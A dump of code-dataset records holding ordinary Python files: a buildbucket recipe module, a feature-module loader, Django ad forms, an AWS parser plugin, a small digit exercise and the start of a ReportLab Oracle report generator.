rpc_pb2.BatchRequest(\n requests=[\n dict(search_builds=dict(\n predicate=p,\n page_size=limit,\n fields=self._default_field_mask('builds.*.'),\n ))\n for p in predicate\n ],\n )\n step_res, batch_res, has_errors = self._batch_request(\n step_name or 'buildbucket.search',\n batch_req,\n rpc_pb2.BatchResponse())\n if has_errors:\n raise self.m.step.InfraFailure('Build search failed')\n\n # Union build results.\n builds = {}\n for r in batch_res.responses:\n for b in r.search_builds.builds:\n if b.id not in builds:\n builds[b.id] = b\n\n # Order newest-to-oldest. Then cut using the limit.\n ret = [b for _, b in sorted(builds.iteritems())][:limit]\n for b in ret:\n self._report_build_maybe(step_res, b, url_title_fn=url_title_fn)\n return ret\n\n def cancel_build(self, build_id, **kwargs):\n return self._run_buildbucket('cancel', [build_id], **kwargs)\n\n def get_multi(self, build_ids, url_title_fn=None, step_name=None):\n \"\"\"Gets multiple builds.\n\n Args:\n * `build_ids`: a list of build IDs.\n * `url_title_fn`: generates build URL title. 
See module docstring.\n * `step_name`: name for this step.\n\n Returns:\n A dict {build_id: build_pb2.Build}.\n \"\"\"\n return self._get_multi(build_ids, url_title_fn, step_name)[1]\n\n def _get_multi(self, build_ids, url_title_fn, step_name):\n \"\"\"Implements get_multi, but also returns StepResult.\"\"\"\n batch_req = rpc_pb2.BatchRequest(\n requests=[\n dict(get_build=dict(id=id, fields=self._default_field_mask()))\n for id in build_ids\n ],\n )\n test_res = rpc_pb2.BatchResponse(\n responses=[\n dict(get_build=dict(id=id, status=common_pb2.SUCCESS))\n for id in build_ids\n ]\n )\n step_res, batch_res, has_errors = self._batch_request(\n step_name or 'buildbucket.get_multi', batch_req, test_res)\n ret = {}\n for res in batch_res.responses:\n if res.HasField('get_build'):\n b = res.get_build\n self._report_build_maybe(step_res, b, url_title_fn=url_title_fn)\n ret[b.id] = b\n if has_errors:\n raise self.m.step.InfraFailure('Getting builds failed')\n return step_res, ret\n\n def get(self, build_id, url_title_fn=None, step_name=None):\n \"\"\"Gets a build.\n\n Args:\n * `build_id`: a buildbucket build ID.\n * `url_title_fn`: generates build URL title. See module docstring.\n * `step_name`: name for this step.\n\n Returns:\n A build_pb2.Build.\n \"\"\"\n builds = self.get_multi(\n [build_id],\n url_title_fn=url_title_fn,\n step_name=step_name or 'buildbucket.get')\n return builds[build_id]\n\n def get_build(self, build_id, **kwargs):\n \"\"\"DEPRECATED. Use get().\"\"\"\n return self._run_buildbucket('get', [build_id], **kwargs)\n\n def collect_build(self, build_id, **kwargs):\n \"\"\"Shorthand for `collect_builds` below, but for a single build only.\n\n Args:\n * build_id: Integer ID of the build to wait for.\n\n Returns:\n [Build](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto).\n for the ended build.\n \"\"\"\n assert isinstance(build_id, int)\n return self.collect_builds([build_id], **kwargs)[build_id]\n\n def collect_builds(\n self, build_ids, interval=None, timeout=None, step_name=None,\n raise_if_unsuccessful=False, url_title_fn=None,\n mirror_status=False,\n ):\n \"\"\"Waits for a set of builds to end and returns their details.\n\n Args:\n * `build_ids`: List of build IDs to wait for.\n * `interval`: Delay (in secs) between requests while waiting for build to end.\n Defaults to 1m.\n * `timeout`: Maximum time to wait for builds to end. Defaults to 1h.\n * `step_name`: Custom name for the generated step.\n * `raise_if_unsuccessful`: if any build being collected did not succeed, raise\n an exception.\n * `url_title_fn`: generates build URL title. See module docstring.\n * `mirror_status`: mark the step as failed/infra-failed if any of the builds\n did not succeed. 
Ignored if raise_if_unsuccessful is True.\n\n Returns:\n A map from integer build IDs to the corresponding\n [Build](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto)\n for all specified builds.\n \"\"\"\n if not build_ids:\n return {}\n interval = interval or 60\n timeout = timeout or 3600\n\n with self.m.step.nest(step_name or 'buildbucket.collect'):\n # Wait for the builds to finish.\n self._run_bb(\n step_name='wait',\n subcommand='collect',\n args=['-interval', '%ds' % interval] + build_ids,\n )\n\n # Fetch build details.\n step_res, builds = self._get_multi(\n build_ids, url_title_fn=url_title_fn, step_name='get')\n\n if raise_if_unsuccessful:\n unsuccessful_builds = sorted(\n b.id for b in builds.itervalues()\n if b.status != common_pb2.SUCCESS\n )\n if unsuccessful_builds:\n step_res.presentation.status = self.m.step.FAILURE\n step_res.presentation.logs['unsuccessful_builds'] = map(\n str, unsuccessful_builds)\n raise self.m.step.InfraFailure(\n 'Triggered build(s) did not succeed, unexpectedly')\n elif mirror_status:\n bs = builds.values()\n if any(b.status == common_pb2.INFRA_FAILURE for b in bs):\n step_res.presentation.status = self.m.step.EXCEPTION\n elif any(b.status == common_pb2.FAILURE for b in bs):\n step_res.presentation.status = self.m.step.FAILURE\n\n return builds\n\n # Internal.\n\n def _batch_request(self, step_name, request, test_response):\n \"\"\"Makes a Builds.Batch request.\n\n Returns (StepResult, rpc_pb2.BatchResponse, has_errors) tuple.\n \"\"\"\n request_dict = json_format.MessageToDict(request)\n try:\n self._run_bb(\n step_name=step_name,\n subcommand='batch',\n stdin=self.m.json.input(request_dict),\n stdout=self.m.json.output(),\n step_test_data=lambda: self.m.json.test_api.output_stream(\n json_format.MessageToDict(test_response)\n ),\n )\n except self.m.step.StepFailure: # pragma: no cover\n # Ignore the exit code and parse the response as BatchResponse.\n # Fail if parsing fails.\n pass\n\n step_res = self.m.step.active_result\n\n # Log the request.\n step_res.presentation.logs['request'] = json.dumps(\n request_dict, indent=2, sort_keys=True).splitlines()\n\n # Parse the response.\n batch_res = rpc_pb2.BatchResponse()\n json_format.ParseDict(\n step_res.stdout, batch_res,\n # Do not fail the build because recipe's proto copy is stale.\n ignore_unknown_fields=True)\n\n # Print response errors in step text.\n step_text = []\n has_errors = False\n for i, r in enumerate(batch_res.responses):\n if r.HasField('error'):\n has_errors = True\n step_text.extend([\n 'Request #%d' % i,\n 'Status code: %s' % r.error.code,\n 'Message: %s' % r.error.message,\n '', # Blank line.\n ])\n step_res.presentation.step_text = '
    '.join(step_text)\n\n return (step_res, batch_res, has_errors)\n\n def _run_bb(\n self, subcommand, step_name=None, args=None, stdin=None, stdout=None,\n step_test_data=None):\n cmdline = [\n 'bb', subcommand,\n '-host', self._host,\n ]\n # Do not pass -service-account-json. It is not needed on LUCI.\n # TODO(nodir): change api.runtime.is_luci default to True and assert\n # it is true here.\n cmdline += args or []\n\n return self.m.step(\n step_name or ('bb ' + subcommand),\n cmdline,\n infra_step=True,\n stdin=stdin,\n stdout=stdout,\n step_test_data=step_test_data,\n )\n\n # TODO(nodir): remove in favor of _run_bb\n def _run_buildbucket(\n self, subcommand, args=None, json_stdout=True, name=None, **kwargs):\n step_name = name or ('buildbucket.' + subcommand)\n\n args = args or []\n if self._service_account_key:\n args = ['-service-account-json', self._service_account_key] + args\n args = ['buildbucket', subcommand, '-host', self._host] + args\n\n kwargs.setdefault('infra_step', True)\n stdout = self.m.json.output() if json_stdout else None\n return self.m.step(step_name, args, stdout=stdout, **kwargs)\n\n def _tags_for_build(self, bucket, parameters, override_tags=None):\n new_tags = self.tags_for_child_build\n builder_name = parameters.get('builder_name')\n if builder_name:\n new_tags['builder'] = builder_name\n # TODO(tandrii): remove this Buildbot-specific code.\n if bucket.startswith('master.'):\n new_tags['master'] = bucket[7:]\n new_tags.update(override_tags or {})\n return sorted(\n '%s:%s' % (k, v)\n for k, v in new_tags.iteritems()\n if v is not None)\n\n @property\n def bucket_v1(self):\n \"\"\"Returns bucket name in v1 format.\n\n Mostly useful for scheduling new builds using V1 API.\n \"\"\"\n return self._bucket_v1\n\n\n # DEPRECATED API.\n\n @property\n def properties(self): # pragma: no cover\n \"\"\"DEPRECATED, use build attribute instead.\"\"\"\n return self._legacy_property\n\n @property\n def build_id(self): # pragma: no cover\n \"\"\"DEPRECATED, use build.id instead.\"\"\"\n return self.build.id or None\n\n @property\n def build_input(self): # pragma: no cover\n \"\"\"DEPRECATED, use build.input instead.\"\"\"\n return self.build.input\n\n @property\n def builder_id(self): # pragma: no cover\n \"\"\"Deprecated. 
Use build.builder instead.\"\"\"\n return self.build.builder\n\n\n# Legacy support.\n\n\ndef _legacy_tags(build_dict, build_msg):\n for t in build_dict.get('tags', []):\n k, v = t.split(':', 1)\n if k =='buildset' and v.startswith(('patch/gerrit/', 'commit/gitiles')):\n continue\n if k in ('build_address', 'builder'):\n continue\n build_msg.tags.add(key=k, value=v)\n\n\ndef _legacy_input_gerrit_changes(\n dest_repeated, build_sets,\n patch_storage, patch_gerrit_url, patch_project, patch_issue, patch_set):\n if patch_storage == 'gerrit' and patch_project:\n host, path = util.parse_http_host_and_path(patch_gerrit_url)\n if host and (not path or path == '/'):\n try:\n patch_issue = int(patch_issue or 0)\n patch_set = int(patch_set or 0)\n except ValueError:\n pass\n else:\n if patch_issue and patch_set:\n dest_repeated.add(\n host=host,\n project=patch_project,\n change=patch_issue,\n patchset=patch_set)\n return\n\n for bs in build_sets:\n if isinstance(bs, common_pb2.GerritChange):\n dest_repeated.add().CopyFrom(bs)\n\n\ndef _legacy_input_gitiles_commit(\n dest, build_dict, build_sets, revision, branch):\n commit = None\n for bs in build_sets:\n if isinstance(bs, common_pb2.GitilesCommit):\n commit = bs\n break\n if commit:\n dest.CopyFrom(commit)\n\n ref_prefix = 'gitiles_ref:'\n for t in build_dict.get('tags', []):\n if t.startswith(ref_prefix):\n dest.ref = t[len(ref_prefix):]\n break\n\n return\n\n if util.is_sha1_hex(revision):\n dest.id = revision\n if branch:\n dest.ref = 'refs/heads/%s' % branch\n\n\ndef _legacy_builder_id(build_dict, mastername, buildername, builder_id):\n builder_id.project = build_dict.get('project') or ''\n builder_id.bucket = build_dict.get('bucket') or ''\n\n if builder_id.bucket:\n luci_prefix = 'luci.%s.' % builder_id.project\n if builder_id.bucket.startswith(luci_prefix):\n builder_id.bucket = builder_id.bucket[len(luci_prefix):]\n if not builder_id.bucket and mastername:\n builder_id.bucket = 'master.%s' % mastername\n\n tags_dict = dict(t.split(':', 1) for t in build_dict.get('tags', []))\n builder_id.builder = tags_dict.get('builder') or buildername or ''\n\n","sub_path":"recipe_modules/buildbucket/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":33308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102976564","text":"import importlib\nimport logging\nimport pkgutil\nimport types\n\nimport funcy\n\nfrom fhub_core.feature import Feature\n\n__all__ = [\n 'get_contrib_features',\n]\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_contrib_features(contrib):\n '''Get contributed features from within given module\n\n Be very careful with untrusted code. The module/package will be\n walked, every submodule will be imported, and all the code therein will be\n executed. 
But why would you be trying to import from an untrusted package\n anyway?\n\n Args:\n contrib (module): module (standalone or package) that contains feature\n definitions\n\n Returns:\n List of Feature\n '''\n\n if isinstance(contrib, types.ModuleType):\n contrib_features = []\n\n # fuuuuu\n importlib.invalidate_caches()\n\n # any module that has a __path__ attribute is a package\n if hasattr(contrib, '__path__'):\n features = get_contrib_features_from_package(contrib)\n contrib_features.extend(features)\n else:\n features = get_contrib_features_from_module(contrib)\n contrib_features.extend(features)\n return contrib_features\n else:\n raise ValueError('Input is not a module')\n\n\ndef get_contrib_features_from_package(package):\n contrib_features = []\n\n logger.debug(\n 'Walking package path {path} to detect modules...'\n .format(path=package.__path__))\n for importer, modname, _ in pkgutil.walk_packages(\n path=package.__path__,\n prefix=package.__name__ + '.',\n onerror=logger.error):\n try:\n mod = importer.find_module(modname).load_module(modname)\n except ImportError:\n logger.exception(\n 'Failed to import module {modname}'\n .format(modname=modname))\n continue\n features = get_contrib_features_from_module(mod)\n contrib_features.extend(features)\n\n return contrib_features\n\n\ndef get_contrib_features_from_module(mod):\n contrib_features = []\n\n logger.debug(\n 'Trying to import contributed feature(s) from module {modname}...'\n .format(modname=mod.__name__))\n\n # case 1: file defines `features` variable\n try:\n features = import_contrib_feature_from_collection(mod)\n contrib_features.extend(features)\n logger.debug(\n 'Imported {n} feature(s) from {modname} from collection'\n .format(n=len(features), modname=mod.__name__))\n except ImportError:\n # case 2: file has at least `input` and `transformer` defined\n try:\n feature = import_contrib_feature_from_components(mod)\n contrib_features.append(feature)\n logger.debug(\n 'Imported 1 feature from {modname} from components'\n .format(modname=mod.__name__))\n except ImportError:\n # case 3: nothing useful in file\n logger.debug(\n 'Failed to import anything useful from module {modname}'\n .format(modname=mod.__name__))\n\n return contrib_features\n\n\ndef import_contrib_feature_from_components(mod):\n required = ['input', 'transformer']\n optional = ['name', 'description', 'output', 'options']\n required_vars, optional_vars = import_names_from_module(\n mod, required, optional)\n feature = Feature(\n input=required_vars['input'],\n transformer=required_vars['transformer'],\n source=mod.__name__,\n **optional_vars)\n return feature\n\n\ndef import_contrib_feature_from_collection(mod):\n required = 'features'\n optional = None\n required_vars, _ = import_names_from_module(\n mod, required, optional)\n features = required_vars['features']\n for feature in features:\n feature.source = mod.__name__\n return features\n\n\ndef import_names_from_module(mod, required, optional):\n\n msg = funcy.partial(\n 'Required variable {varname} not found in module {modname}'\n .format, modname=mod.__name__)\n\n # required vars\n if required:\n required_vars = {}\n if isinstance(required, str):\n required = [required]\n for varname in required:\n if hasattr(mod, varname):\n required_vars[varname] = getattr(mod, varname)\n else:\n raise ImportError(msg(varname=varname))\n else:\n required_vars = None\n\n # optional vars\n if optional:\n if isinstance(optional, str):\n optional = [optional]\n optional_vars = {k: getattr(mod, k)\n for k in optional 
if hasattr(mod, k)}\n    else:\n        optional_vars = None\n\n    return required_vars, optional_vars\n","sub_path":"fhub_core/contrib.py","file_name":"contrib.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"311648445","text":"import ConfigParser\n\n\nclass ConfigInitializer:\n    def createConfig(self, file, min_edge, max_edge, bin_size, first_bin, overbookingfactor):\n        config = ConfigParser.ConfigParser()\n        config.add_section('bins')\n        config.set('bins', 'min_edge', min_edge)\n        config.set('bins', 'max_edge', max_edge)\n        config.set('bins', 'bin_size', bin_size)\n        config.set('bins', 'first_bin', first_bin)\n\n        config.add_section('overbookingfactor')\n        config.set('overbookingfactor', 'x', overbookingfactor)\n\n        configfile = open(file, 'w')\n        config.write(configfile)\n","sub_path":"Allocation_optimizer/Updated_sourcecode/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"558149310","text":"# -*- coding: utf-8 -*-\n\n'''\nWrite a function that takes a list of digits and checks\nwhether a given digit occurs the specified number of times\nin a row. The function must return True or False. We assume\nthat all parameters will always be valid.\n\nTemplate:\n\nis_there_consecutive([lst], n, times)\n\n- [lst] - the list can be of any length, the digits come in arbitrary order\n- n - the digit to check for\n- times - how many times in a row the digit n must occur\n\nExamples:\n\nis_there_consecutive([1, 3, 5, 5, 3, 3, 1], 3, 2) True\nis_there_consecutive([1, 2, 3, 4, 5], 1, 1) True\nis_there_consecutive([3], 1, 0) True\nis_there_consecutive([2, 2, 3, 2, 2, 2, 2, 3, 4, 1, 5], 3, 2) False\nis_there_consecutive([5, 5, 5, 5, 5], 5, 7) False\n'''\n\nfrom typing import List\n\ndef is_there_consecutive(arr: List[int], nbr: int, times: int) -> bool:\n    '''Determines whether the digit nbr occurs in the list arr times times in a row.'''\n    # Checks whether the string made of the digit nbr repeated times times\n    # occurs in the string built from the list arr.\n    return str(nbr) * times in ''.join(map(str, arr))\n\n\n\ntests = ((([1, 3, 5, 5, 3, 3, 1], 3, 2), True),\n         (([1, 2, 3, 4, 5], 1, 1), True),\n         (([3], 1, 0), True),\n         (([2, 2, 3, 2, 2, 2, 2, 3, 4, 1, 5], 3, 2), False),\n         (([5, 5, 5, 5, 5], 5, 7), False))\n\nfor args, check in tests:\n    print(is_there_consecutive(*args) == check)\n\n","sub_path":"easy/is_there_consecutive.py","file_name":"is_there_consecutive.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"97959145","text":"from nightowl.models.nom import NetworkIPv4Address\nfrom nightowl.plugins.parser.aws.base import AWSPropertyParserBase\nfrom nightowl.utils.aws import get_name\n\n\nclass ParserPlugin(AWSPropertyParserBase):\n\n    def execute(self):\n        network_object = self.network_object\n        network_object.noid = self.resource.attachment['InstanceId']\n        network_object.name = get_name(self.resource.tag_set, self.resource.id)\n        network_object.aws_tags = [\n            {'key': tag['Key'], 'value': tag['Value']} for tag in self.resource.tag_set]\n        private_ip_address = self.resource.private_ip_address\n        cidr_block = self.resource.subnet.cidr_block\n        prefix_len = int(cidr_block.split('/')[1])\n        network_object.ipv4_addrs = [NetworkIPv4Address(\n            addr=private_ip_address,\n            prefix_len=prefix_len,\n            subnet=cidr_block,\n        )]\n        
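# The network object now carries the instance id, display name, AWS tags and its primary private IPv4 address.\n        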
return network_object\n","sub_path":"nightowl/plugins/parser/aws/network_interface.py","file_name":"network_interface.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593704642","text":"#-*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.gis.geos import Point\nfrom django.conf import settings\n\nfrom pygeocoder import Geocoder, GeocoderError\n\nfrom geoads.models import AdPicture, AdContact, AdSearch, AdSearchResult, Ad\nfrom geoads.widgets import ImageWidget\nfrom geoads.utils import geocode\n\n\nclass AdPictureForm(ModelForm):\n \"\"\"\n Ad picture form\n Warning: just used for class based views in this app\n Applications could/should make it more pretty\n\n \"\"\"\n image = forms.ImageField(widget=ImageWidget(), required=False)\n\n class Meta:\n model = AdPicture\n\n\nclass AdContactForm(ModelForm):\n \"\"\"\n Ad contact form\n\n \"\"\"\n class Meta:\n model = AdContact\n exclude = ['user', 'content_type', 'object_pk']\n\n\nclass AdSearchForm(ModelForm):\n \"\"\"\n Ad search form\n\n \"\"\"\n class Meta:\n model = AdSearch\n fields = ('search', )\n widgets = {\n 'search': forms.HiddenInput\n }\n\n\nclass AdSearchResultContactForm(ModelForm):\n \"\"\"\n Ad Search Result Contact Form\n\n \"\"\"\n message = forms.CharField(\n widget=forms.Textarea(attrs={'rows': 4}), required=False\n )\n\n class Meta:\n model = AdSearchResult\n fields = ('message', 'id')\n exclude = ('ad_search', 'content_type',\n 'object_pk', 'create_date', 'contacted')\n\n\nclass AdSearchUpdateForm(ModelForm):\n \"\"\"\n Ad search form for update\n\n \"\"\"\n class Meta:\n model = AdSearch\n fields = ('public', 'description')\n\n\nclass BaseAdForm(ModelForm):\n \"\"\"\n Base ad form\n Use it with your own Ad instance\n\n \"\"\"\n def clean_user_entered_address(self):\n # here we try to figure if user entered address\n # is an existing address\n # ! 
of course, this will be needed another time\n # to set address and location fields in ad model\n # don't know how to improve this for the moment\n # and just have it computed one time\n data = self.cleaned_data['user_entered_address']\n if settings.BYPASS_GEOCODE == True:\n if data == 'fkjfkjfkjfkj': # hook to not use BYPASS_GEOCODE\n raise forms.ValidationError(u\"Indiquer une adresse valide.\")\n return data\n else:\n try:\n geocode(data.encode('ascii', 'ignore'))\n except: # TODO: create GeocodeError\n raise forms.ValidationError(u\"Indiquer une adresse valide.\")\n return data\n\n class Meta:\n model = Ad\n exclude = ('user', 'delete_date', 'location', 'address')\n","sub_path":"geoads/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439099449","text":"# -*- coding:utf-8 -*-\n'''\n@project: '__dbreport__.py'\n@modules: report.oraclerpt\n@description:\n\n@author: abelit\n@email: ychenid@live.com\n@created:Mar 5, 2018\n\n@licence: GPL\n'''\n\n__version__ = '''$Id$'''\n# from reportlab.lib.testutils import outputfile,setOutDir\n# setOutDir(__name__)\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch, cm\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.platypus.frames import Frame\nfrom reportlab.platypus.paragraph import Paragraph\nfrom reportlab.platypus.flowables import Spacer, Preformatted\nfrom reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate, NextPageTemplate\nfrom reportlab.platypus import tableofcontents, PageBreak\nfrom reportlab.lib.enums import TA_CENTER, TA_LEFT\nfrom reportlab.platypus import Table, TableStyle\nfrom reportlab.lib import colors\nfrom reportlab.graphics import shapes\nfrom reportlab.graphics.widgets import signsandsymbols\n# 导入生产条形码的工具包\nfrom reportlab.graphics.barcode import eanbc, qr\nfrom reportlab.graphics.shapes import Drawing, Image, Rect\nfrom reportlab.graphics import renderPDF\n\n# 导入注册字体的模块\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase.cidfonts import UnicodeCIDFont\nfrom reportlab.platypus import Image as platImage\n\nfrom math import sqrt\nimport datetime, calendar, time\nimport random\nimport io\n\n# 导入画图模块\nimport matplotlib.pyplot as plt\n# import matplotlib.dates as mdates\n\n# 导入自定义模块\n# 导入数据库信息提取模块\nfrom report.database import Oracle\n# 导入系统获取操作系统信息模块\nfrom report.host import HostMetric\nfrom config import settings\n\n# 注册字体\npdfmetrics.registerFont(UnicodeCIDFont('STSong-Light'))\npdfmetrics.registerFont(TTFont('msyh', settings.path_settings['font'] + 'msyh.ttf'))\n\n\nmyFontName = 'msyh'\n\nclass BarCodes:\n barcode_value = ''\n for i in range(10):\n barcode_value = barcode_value + str(random.randint(0, 9))\n\n def genEan13Barcode(self, canvas, x, y, width=50, height=10, barcode_value=barcode_value):\n # draw the eanbc13 code\n barcode_eanbc13 = eanbc.Ean13BarcodeWidget(barcode_value)\n d = Drawing(width=width, height=height)\n d.add(barcode_eanbc13)\n renderPDF.draw(d, canvas, x, y)\n\n def genEan8Barcode(self, canvas, x, y, width, height, barcode_value=\"1234567890\"):\n # draw the eanbc8 code\n barcode_eanbc8 = eanbc.Ean8BarcodeWidget(self.barcode_value)\n d = Drawing(width=width, height=height)\n d.add(barcode_eanbc8)\n renderPDF.draw(d, canvas, x, y)\n\n def genQrCode(self, canvas, x, y, width, height, qr_value='http://www.dataforum.org'):\n # draw a QR code\n
qr_code = qr.QrCodeWidget(qr_value)\n bounds = qr_code.getBounds()\n width = bounds[2] - bounds[0]\n height = bounds[3] - bounds[1]\n d = Drawing(width, height, transform=[45. / width, 0, 0, 45. / height, 0, 0])\n d.add(qr_code)\n renderPDF.draw(d, canvas, x, y)\n\n\nclass DrawShape:\n def drawArrow(self, xdraw, ydraw, size, rotate, x, y, color):\n # drawArrow(10,20,20,90,0,-15,colors.green)\n # drawArrow(10,20,20,-90,-20,-5,colors.red)\n # 画绿色向上箭头\n d = shapes.Drawing(xdraw, ydraw)\n ao = signsandsymbols.ArrowOne()\n ao.fillColor = color\n ao.size = size\n d.rotate(rotate)\n ao.x, ao.y = x, y\n d.add(ao)\n\n return d\n\n def drawAlert(self, xdraw, ydraw, size, x, y, strokewidth, color):\n # drawAlert(20,20,20,0,0,4,colors.red)\n # drawAlert(20,20,20,0,0,0,colors.green)\n # 画告警图\n d = Drawing(xdraw, ydraw)\n ds = signsandsymbols.DangerSign()\n ds.x, ds.y = x, y\n ds.size = size\n ds.strokeWidth = strokewidth\n ds.fillColor = color\n d.add(ds)\n\n return d\n\n def drawSmile(self, xdraw, ydraw, size, x, y):\n # drawSmile(20,20,20,0,0)\n d = Drawing(xdraw, ydraw)\n ds = signsandsymbols.SmileyFace()\n ds.x, ds.y = x, y\n ds.size = size\n d.add(ds)\n\n return d\n\n def drawCrossbox(self, xdraw, ydraw, size, x, y, crosscolor, fillcolor):\n # drawCrossbox(20,20,20,0,0,colors.red,colors.white)\n # drawCrossbox(20,20,20,0,0,colors.green,colors.green)\n # 画Xbox信息\n d = Drawing(xdraw, ydraw)\n ds = signsandsymbols.Crossbox()\n ds.x, ds.y = x, y\n ds.size = size\n ds.crosswidth = 3\n ds.crossColor = crosscolor\n ds.fillColor = fillcolor\n d.add(ds)\n\n return d\n\n def drawBattery(self, xdraw, ydraw, pct, pctcolor):\n # drawBattery(25,20,5,colors.green)\n # 画使用率图\n d = Drawing(xdraw, ydraw)\n r = Rect(0, 0, 25 * pct, ydraw)\n r.fillColor = pctcolor\n r.strokeColor = colors.green\n r.strokeWidth = 0\n\n s = Rect(0, 0, xdraw, ydraw)\n s.fillColor = colors.white\n s.strokeColor = colors.green\n d.add(s)\n d.add(r)\n\n return d\n\ndef plot_curve(x, y, title, xlabel, ylabel):\n plt.figure(figsize=(20, 5))\n# xs = [datetime.datetime.strptime(d, '%Y-%m-%d').date() for d in x]\n# plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m-%d'))\n# plt.gca().xaxis.set_major_locator(mdates.DayLocator())\n\n plt.title(title)\n plt.plot(x, y, 'o-')\n plt.gcf().autofmt_xdate() # 自动旋转日期标记\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n# plt.show()\n imgdata = io.BytesIO()\n plt.savefig(imgdata, format='png')\n imgdata.seek(0) # rewind the data\n\n img = platImage(imgdata, 600, 180)\n\n return img\n\n\n#\ndef makeHeaderStyle(level, fontName=myFontName):\n \"Make a header style for different levels.\"\n\n assert level >= 0, \"Level must be >= 0.\"\n\n PS = ParagraphStyle\n size = 24.0 / sqrt(1 + level)\n style = PS(name='Heading' + str(level),\n fontName=fontName,\n fontSize=size,\n leading=size * 1.2,\n spaceBefore=size / 4.0,\n spaceAfter=size / 8.0)\n return style\n\n\ndef makeBodyStyle(fontName=myFontName, firstLineIndent=20):\n \"Body text style - the default will do\"\n# return ParagraphStyle('body')\n styleSheet = getSampleStyleSheet()\n myBodyStyle = styleSheet['BodyText']\n myBodyStyle.fontName = fontName\n myBodyStyle.leading = 14\n myBodyStyle.firstLineIndent = firstLineIndent\n myBodyStyle.wordWrap = 'CJK'\n\n return myBodyStyle\n\n\ndef makeTitleStyle(fontSize=18, fontName=myFontName):\n \"Title text style - the default will do\"\n# return ParagraphStyle('body')\n styleSheet = getSampleStyleSheet()\n myTitleStyle = styleSheet['Title']\n myTitleStyle.fontName = fontName\n myTitleStyle.fontSize = fontSize\n\n 
return myTitleStyle\n\ndef makeListTitleStyle(fontSize=18, fontName=myFontName):\n \"Title text style - the default will do\"\n styleSheet = getSampleStyleSheet()\n myTitleStyle = styleSheet['Title']\n myTitleStyle.alignment = TA_LEFT\n myTitleStyle.fontName = fontName\n myTitleStyle.fontSize = fontSize\n\n return myTitleStyle\n\ndef makeTocHeaderStyle(level, delta, epsilon, fontName=myFontName):\n \"Make a header style for different levels.\"\n\n assert level >= 0, \"Level must be >= 0.\"\n\n PS = ParagraphStyle\n size = 12\n style = PS(name='Heading' + str(level),\n fontName=fontName,\n fontSize=size,\n leading=size * 1.2,\n spaceBefore=size / 4.0,\n spaceAfter=size / 8.0,\n firstLineIndent=-epsilon,\n leftIndent=level * delta + epsilon)\n\n return style\n\ndef makeTableTitleStyle(fontSize=12, fontName=myFontName):\n styleSheet = getSampleStyleSheet()\n myTitleStyle = styleSheet['BodyText']\n myTitleStyle.alignment = TA_CENTER\n myTitleStyle.leading = 18\n myTitleStyle.fontName = fontName\n myTitleStyle.fontSize = fontSize\n\n return myTitleStyle\n\ndef makeTable(data, title=None, note=None, colwidth=None):\n lst = []\n\n# if colwidth is not None:\n# cw = list(colwidth)\n# for i in range(len(cw)-1):\n# cw[i] = cw[i] * tablewidth\n# colwidth = tuple(cw)\n t = Table(data, colWidths=colwidth)\n ts = TableStyle(\n [('LINEABOVE', (0, 0), (-1, 0), 2, colors.green),\n ('LINEABOVE', (0, 1), (-1, -1), 0.25, colors.black),\n ('LINEBELOW', (0, -1), (-1, -1), 3, colors.green, 'butt'),\n ('LINEBELOW', (0, -1), (-1, -1), 1, colors.white, 'butt'),\n ('FONT', (0, 0), (-1, 0), 'msyh'),\n ('FONT', (0, 0), (-1, -1), 'msyh'),\n ('FONTSIZE', (0, 0), (-1, -1), 8),\n ('ALIGN', (2, 1), (-1, -1), 'LEFT'),\n ('TEXTCOLOR', (0, 1), (0, -1), colors.black),\n ('BACKGROUND', (0, 0), (-1, 0), colors.Color(0, 0.7, 0.7))]\n )\n t.setStyle(ts)\n if title is not None:\n lst.append(Paragraph(title, makeTableTitleStyle()))\n lst.append(t)\n if note is not None:\n lst.append(Paragraph(note, makeBodyStyle()))\n lst.append(Spacer(0, 0.5 * cm))\n return lst\n\ndef wrapTable(data, cols=None, style=makeBodyStyle(firstLineIndent=0)):\n ''' To auto wrap text in the cells of the table.\n usage: data = wrapTable(data, cols=[1,2])\n '''\n formated_data = []\n\n collist = []\n if isinstance(cols, int):\n collist.append(cols)\n cols = tuple(collist)\n\n for dvalue in data:\n nvalue = list(dvalue)\n if cols is not None:\n for i in cols:\n nvalue[i] = Paragraph(nvalue[i], style)\n formated_data.append(nvalue)\n\n return formated_data\n\nclass MyDocTemplate(BaseDocTemplate):\n \"The document template used for all PDF documents.\"\n\n _invalidInitArgs = ('pageTemplates',)\n\n def __init__(self, conf, filename, **kw):\n frame_first_page = Frame(2.5 * cm, 2.5 * cm, 15 * cm, 25 * cm, id='first')\n frame_remaining_pages = Frame(2.5 * cm, 2.5 * cm, 16 * cm, 25 * cm, id='remaining')\n frame_last_page = Frame(2.5 * cm, 2.5 * cm, 15 * cm, 25 * cm, id='last')\n self.allowSplitting = 0\n BaseDocTemplate.__init__(self, filename, **kw)\n firstpage_template = PageTemplate(id='first_page', frames=frame_first_page, onPage=self.on_first_page)\n mainpage_template = PageTemplate(id='remaining_pages', frames=frame_remaining_pages, onPage=self.on_remaining_pages)\n 